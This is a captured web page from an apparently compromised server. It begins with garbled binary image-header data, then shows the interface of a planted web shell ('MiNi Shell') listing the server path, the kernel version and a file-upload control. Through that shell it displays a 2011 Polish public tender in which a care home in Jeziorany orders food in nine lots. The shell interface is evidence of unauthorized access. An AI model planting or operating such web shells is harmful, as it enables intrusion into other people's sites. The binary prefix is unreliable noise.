JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111212/421682-N-2011.html

<p class="kh_header"><b>Jeziorany: Dostawa żywnosci dla DPS Jeziorany</b><br>
<b>Numer ogłoszenia: 421682 - 2011; data zamieszczenia: 12.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Kajki 49, 11-320 Jeziorany, woj. warmińsko-mazurskie, tel. 0-89 7181 664, faks 0-89 7181 664.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: opieka społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywnosci dla DPS Jeziorany.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Część I - 		Artykuły spożywcze
	2. Część II -		 Drób
	3. Część III - 		Jaja
	4. Część IV - 		Mrożonki
	5. Część V  - 		Mięso i wędliny
	6. Część VI - 		Ryby i konserwy rybne
	7. Część VII - 		Nabiał
	8  Część VIII -		Pieczywo
	9. Część IX  - 		Warzywa i owoce.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiajacy nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.warmia.mazury.pl/powiat_olsztynski<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Spolecznej
ul.Kajki 49
11-320 Jeziorany.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.12.2011 godzina 10:00, miejsce: Dom Pomocy Spolecznej
ul.Kajki 49
11-320 Jeziorany 
Budynek administracji pokój kadr.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Artyukły spozywcze   część I					
					
Lp.	Nazwa produktu	Ilość	Jednostka miary	Cena brutto	Wartość
1.	Aromaty	400	szt		
2.	Cukier puder	40	kg		
3.	Cukier waniliowy	18	kg		
4.	Cukier kryształ	2300	kg		
5.	Dżem(mix owoc.)	300	kg		
6.	Groszek konserwowy	60	kg		
7.	Herbata granul. Saga	60	kg		
8.	Koncentrat pomid. 30%	340	kg		
9.	Kasza manna	100	kg		
10.	Kasza jęczm. drobna	150	kg		
11.	Kasza pęczak	50	kg		
12.	Kasza gryczana	80	kg		
13.	Ketchup łagodny	280	kg		
14.	Kakao	20	kg		
15.	Kawa zboż. Kujawianka	150	kg		
16.	Kawa Inka	20	kg		
17.	Kwasek cytrynowy	17	kg		
18.	Liść laurowy	4,5	kg		
19.	Margaryna palma	440	kg		
20.	Musztarda stołowa	120	kg		
21.	Mąka pszenna /450/  tortowa	1200	kg		
22.	Mąka ziemniaczana	40	kg		
23.	Olej rzepakowy	400	l		
24.	Olej słonecznikowy	80	l		
25.	Ocet 10%	18	l		
26.	Pasztet drobiowy	290	kg		
27.	Płatki owsiane	25	kg		
28.	Przyp. do zup w pł. 1 l.	230	l		
29.	Proszek do pieczenia	1,6	kg		
30.	Sól kuchenna drobna	550	kg		
31.	Szczaw konserw. kroj.	50	kg		
32.	Ziele angielskie	4,5	kg		
33.	Pieprz natur. mielony	4,5	kg		
34.	Pieprz ziołowy	4,5	kg		
35.	Majonez Kętrzyński	230	kg		
36.	Żelatyna spożywcza	1	kg		
37.	Cynamon	2	kg		
38.	Papryka miel. słodka	1,5	kg		
39.	Miód pszczeli wielokwiatowy	150	kg		
40.	Konserwa mięsna	360	kg		
41.	Majeranek	2	kg		
42.	Zioła Prowansalskie	2	kg		
43.	Przyprawa do mięsa Wegeta	20	kg		
44.	Bulion jarzynowy	22	kg		
45.	Syrop -zaprawa owocowa	60	l		
46.	Chrupki mazur. 50 g.	300	szt		
47.	Kisiel bez cukru	140	kg		
48.	Budyń bez cukru	60	kg		
49.	Chrzan konserwowy	28	kg		
50.	Makaron krajanka	200	kg		
51.	Płatki kukurydziane	300	kg		
52.	Rodzynki	12	kg		
53.	Ryż	200	kg		
54.	Rosół drobiowy	5	kg		
55	Makaron kolanka	100	kg		
56	Makaron świderki	800	kg		
57	Musli	200	kg		
58	Ciastka herbatniki	200	kg		
59	Fasola czerwona 	15	kg		
60	Papryka konserwowa	50	kg		
61	Kukurydza konserwowa	45	kg		
62	Ananas w puszce	30	kg		
63	Brzoskwinie puszka	40	kg		
64	Soda oczyszczona	1	kg		
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Drób część II					
					
Lp.	Opis zamówienia	Ilość	Jednostka miary	Cena brutto	Wartość
1	Noga z kurczaka-udka	550	kg		
2	Udko z kurczaka-ćwiartka tylna	400	kg		
3	Filet z kurczaka	250	kg		
4	Skrzydełka 	500	kg		
5	Wątróbka drobiowa	100	kg		
6	Żołądki drobiowe	100	kg		
7	Porcje rosołowe	300	kg		
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja cześć III					
					
Lp.	Opis zamówienia	Ilość	Jednostka miary	Cena brutto	Wartość
1	Jaja 53g M	22 500	szt		
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mrożonki  część IV					
					
Lp.	Opis zamówienia	Ilość	Jednostka miary	Cena brutto	Wartość
1	Kalafior mrożony	420	kg		
2	Mieszanka kompotowa	700	kg		
3	Fasolka szparagowa	420	kg		
4	Wiśnie mrożone	60	kg		
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mięso i wędliny częśc V					
					
Lp.	Opis zamówienia	Ilość	Jednostka miary	Cena brutto	Wartość
1	Baleron wędzony	160	kg		
2	Boczek wędzony	100	kg		
3	Polędwica wędzona	140	kg		
4	Polędwica z indyka	130	kg		
5	Pasztetowa 	180	kg		
6	Szynka wędzona	200	kg		
7	Szynkówka drobiow.	80	kg		
8	Mortadela 	160	kg		
9	Mortadela drobiowa	100	kg		
10	Parówkowa 	380	kg		
11	Parówki śląskie	150	kg		
12	Zwyczajna 	550	kg		
13	Żywiecka 	180	kg		
14	Kaszanka 	200	kg		
15	Krupniok śląski	120	kg		
16	Mielonka turystycz.	180	kg		
17	Salceson włoski	150	kg		
18	Salceson ozorkowy	100	kg		
19	Zwyczajna z indyka	50	kg		
20	Szynka konserwowa	120	kg		
21	Kiełbasa szynkowa	160	kg		
22	Kiełbasa kanapkowa	120	kg		
23	Serdelki wieprzowe	140	kg		
24	Kiełbasa biała regionalna	40	kg		
25	Kiełbasa biesiadna	110	kg		
26	Karkówka b/kości	250	kg		
27	Mięso drobne chude	500	kg		
28	Szynka wp.sur. b/k	300	kg		
29	Łopatka wp. b/k	700	kg		
30	Golonka przód	90	kg		
31	Schab b/k	230	kg		
32	Żeberka	300	kg		
33	Słonina	150	kg		
34	Kości schabowe	1000	kg		
35	Wątroba wieprzowa	100	kg		
36	Nogi wieprzowe	100	kg		
37	Boczek surowy	180	kg		
38	Wołowina b/k szynka	150	kg		
39	Flaki krojone wołowe	200	kg		
39	Smalec 	250	kg		
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Ryby i konserwy rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ryby i konserwy rybne częśc VI					
					
Lp.	Opis zamówienia	Ilość	Jednostka miary	Cena brutto	Wartość
1	Makrela wędzona	120	kg		
2	Tilapia	250	kg		
3	Konserwa rybna  w pomidorach	300	kg		
4	Paluszki rybne	100	kg		
5	Paprykarz szczeciński	180	kg		
6	Filety śledziowe	100	kg		
7	Panga filet	400	kg		
8	Tuńczyk w sosie własnym	20	kg		
9	Sałatka rybna	120	kg		
10	Filety śledziowe w zalewie octowej	50	kg		
11	Mintaj kostka panierowana	300	kg		
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nabiał część VII					
					
Lp.	Opis zamówienia	Ilość	Jednostka miary	Cena brutto 	wartość
1	Mleko 2% - karton 1l	16 000	litr		
2	Śmietana 18%	600	kg		
3	Maślanka naturalna	220	kg		
4	Ser żółty twardy	350	kg		
5	Ser twarog.półtłust	600	kg		
6	Ser topiony kostka	250	kg		
7	Masło exstra	1 350	kg		
8	Serek homogenizow.	200	kg		
9	Jogurt owocowy	200	kg		
10	Jogurt naturalny 	200	kg		
11	Kefir	100	kg		
12	Ser topiony plastry	200	kg		
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pieczywo częśc VIII					
					
Lp.	Opis zamówienia	Ilość	Jednostka miary	Cena brutto	Wartość
1	Bułka tarta	200	kg		
2	Drożdże piekarnicze	25	kg		
3	Bułka zwykła 0,09	600	szt.		
4	Chleb pszenny krojony 0,5 kg	6 000	szt.		
5	Chleb zwykły krojony 0,5 kg	12 500	szt.		
6	Chleb razowy krojony 0,4 kg	3 200	szt.		
7	Pączki 0,05	300	szt		
8	Bułka bagietka	400	szt		
8	Bułka słodka	900	szt.		
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warzywa i owoce część IX					
					
Lp.	Opis zamówienia	Ilość	Jednostka miary	Cena brutto	Wartość
1	Buraki czerwone	700	kg		
2	Cebula	600	kg		
3	Fasola biała	110	kg		
4	Groch	70	kg		
5	Kapusta kiszona	800	kg		
6	Kapusta biała	550	kg		
7	Kapusta pekińska	300	kg		
8	Kapusta świeża	300	kg		
9	Kapusta czerwona	250	kg		
10	Ogórki konserwowe	200	kg		
11	Ogórki kiszone	550	kg		
12	Marchewka	2 800	kg		
13	Ogórki  świeże	700	kg		
14	Pietruszka	800	kg		
15	Por	250	kg		
16	Szczypior	30	kg		
17	Seler	700	kg		
18	Włoszczyzna suszona	80	kg		
19	Ziemniaki	14 000	kg		
20	Pieczarki	240	kg		
21	Banany	400	kg		
22	Cytryna	450	kg		
23	Czosnek	3	kg		
24	Jabłka	2 500	kg		
25	Grejfrut	150	kg		
26	Pomidory	400	kg		
27	Pomarańcze	150	kg		
28	Truskawki	50	kg		
29	Arbuz	80	kg		
30	Mandarynki	200	kg		
31	Sałata zielona	80	kg		
32	Rzodkiewka	50	kg		
33	Pogrzybek suszony	2	kg		
34	Śliwki suszone	5	kg		
35	Mak	5	kg		
36	Kapusta brukselka	100	kg		
37	Szpinak 	100	kg		
38	Kiwi	100	kg		
39	Brokuły	100	kg		
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.00.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com